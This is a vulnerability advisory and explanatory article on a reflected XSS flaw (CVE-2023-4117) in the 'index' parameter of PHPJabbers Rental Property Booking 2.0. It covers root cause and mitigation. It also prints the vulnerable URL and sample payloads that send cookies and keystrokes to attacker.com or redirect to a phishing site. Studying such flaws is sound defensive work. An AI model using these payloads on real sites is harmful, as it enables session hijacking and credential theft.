PHPJabbers Rental Property Booking 2.0 - Reflected XSS
# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 22/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4117
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'index' is vulnerable to RXSS
https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
[-] DonePHPJabbers Rental Property Booking 2.0: Reflected XSS Vulnerability Exploited
Security researchers have identified a critical reflected XSS (Cross-Site Scripting) vulnerability in PHPJabbers’ Rental Property Booking 2.0 application, assigned CVE-2023-4117. This flaw enables attackers to inject malicious scripts into web pages via manipulated URLs, potentially compromising user sessions and stealing sensitive data.
Understanding Reflected XSS
Reflected XSS occurs when user input is directly embedded into a web page without proper sanitization. Unlike stored XSS, which persists in the database, reflected XSS is triggered by a single request—typically through a malicious link sent via email, chat, or social media.
When a victim clicks on a crafted URL, the malicious script executes in their browser, exploiting the trust they have in the domain. This makes reflected XSS particularly dangerous in social engineering scenarios.
Attack Vector: The index Parameter in index.php
The vulnerability resides in the index.php file, specifically in the index GET parameter. This parameter is used to control navigation within the application’s frontend interface.
https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
Here, the index parameter is directly echoed back in the response without filtering or escaping. An attacker can replace [XSS] with malicious JavaScript code to trigger execution.
Real-World Exploit Example
Consider the following malicious URL:
https://example.com/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=<script>alert('XSS');</script>&date=
When a user visits this link, the browser renders the script, triggering an alert popup. While this example is benign, it demonstrates how easily malicious code can be injected.
More dangerous payloads could include:
- Stealing session cookies:
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script> - Redirecting users to phishing sites:
<script>window.location='https://fake-login.com';</script> - Injecting keyloggers:
<script>document.addEventListener('keydown', function(e) { fetch('https://attacker.com/log?key='+e.key); });</script>
Impact and Risks
Due to the reflected nature of the vulnerability, the impact is immediate and user-specific:
| Attack Type | Impact | Attack Vector |
|---|---|---|
| Session Hijacking | Unauthorized access to user accounts | Malicious URL via email or chat |
| Phishing | Deceptive login pages leading to credential theft | Redirects via XSS payload |
| Malware Delivery | Execution of client-side exploits | Script injection through URL |
Attackers can leverage this flaw to craft convincing phishing links, especially when targeting users who trust the domain (e.g., property booking sites). The lack of input validation in index makes it a prime target for exploitation.
Root Cause Analysis
The vulnerability stems from improper handling of user-supplied input in the application’s frontend routing logic. Specifically:
- Input is not sanitized before being displayed.
- No output encoding (e.g., HTML entity escaping) is applied.
- Security checks are absent for sensitive parameters like
index.
PHPJabbers’ codebase appears to rely on basic routing without implementing security best practices—common in open-source projects with minimal security audits.
Recommendations and Mitigation
Developers and administrators must take immediate action to prevent exploitation:
- Sanitize all user inputs: Use functions like
htmlspecialchars()in PHP to escape special characters. - Validate parameter values: Restrict
indexto predefined, safe options (e.g.,search,book,calendar). - Implement Content Security Policy (CSP): Add headers like
Content-Security-Policy: default-src 'self';to block inline scripts. - Use secure session management: Avoid exposing session IDs in URLs; use cookies instead.
Corrected Code Example
Here’s how to properly handle the index parameter in PHP:
<?php
// Define allowed values
$allowed_indices = ['search', 'book', 'calendar', 'profile'];
// Retrieve input
$index = $_GET['index'] ?? '';
// Validate and sanitize
if (in_array($index, $allowed_indices)) {
$safe_index = htmlspecialchars($index);
} else {
$safe_index = 'search'; // fallback
}
// Use in output
echo '<div>Current page: ' . $safe_index . '</div>';
?>
This code ensures that only predefined, safe values are processed and rendered, preventing script injection.
Conclusion
The CVE-2023-4117 vulnerability in PHPJabbers Rental Property Booking 2.0 highlights the importance of input validation and output encoding in web applications. Even seemingly harmless parameters like index can become attack vectors if not properly secured.
As developers, we must prioritize security from the start—using defensive coding practices, regular audits, and proactive patching. Users should avoid clicking on suspicious links, especially from unknown sources, and ensure their software is updated to the latest version.
Security is not optional—it’s essential.